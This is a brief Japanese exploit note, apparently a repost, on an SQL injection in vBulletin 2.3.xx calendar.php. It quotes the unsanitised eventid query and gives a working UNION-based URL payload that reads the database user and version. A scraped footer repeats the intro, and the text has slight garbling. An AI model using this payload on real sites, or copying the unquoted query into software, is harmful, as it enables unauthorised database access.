vBulletin フォーラム 2.3.xx SQL インジェクション_PHP チュートリアル

vBulletin フォーラム 2.3.xx SQL インジェクション Calendar.php.

にはSQLインジェクションの問題が存在します-------- Calendar.phpの585行目から切り取り ----------
else if ($action == "edit" )
{
$eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM Calendar_events WHEREeventid = $eventid");
---------- ----------------------------------------

MySQLのバージョンが大きい場合4.00 よりも、UNION 攻撃が使用できるようになりました。

-------------------------------------- ---
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(), version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
------------------------ -----------------

query_first 関数はクエリ結果の最初の行のみを返すため、!
必要な行を返すようにしてください。

http://www.bkjia.com/PHPjc/314536.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/314536.html技術記事 vBulletin フォーラム 2.3.xx SQL インジェクションcalendar.php に SQL インジェクションの問題が存在します。 -------- Calendar.php の 585 行目から切り取り ---------- else if ($action == "edit") { $eventi...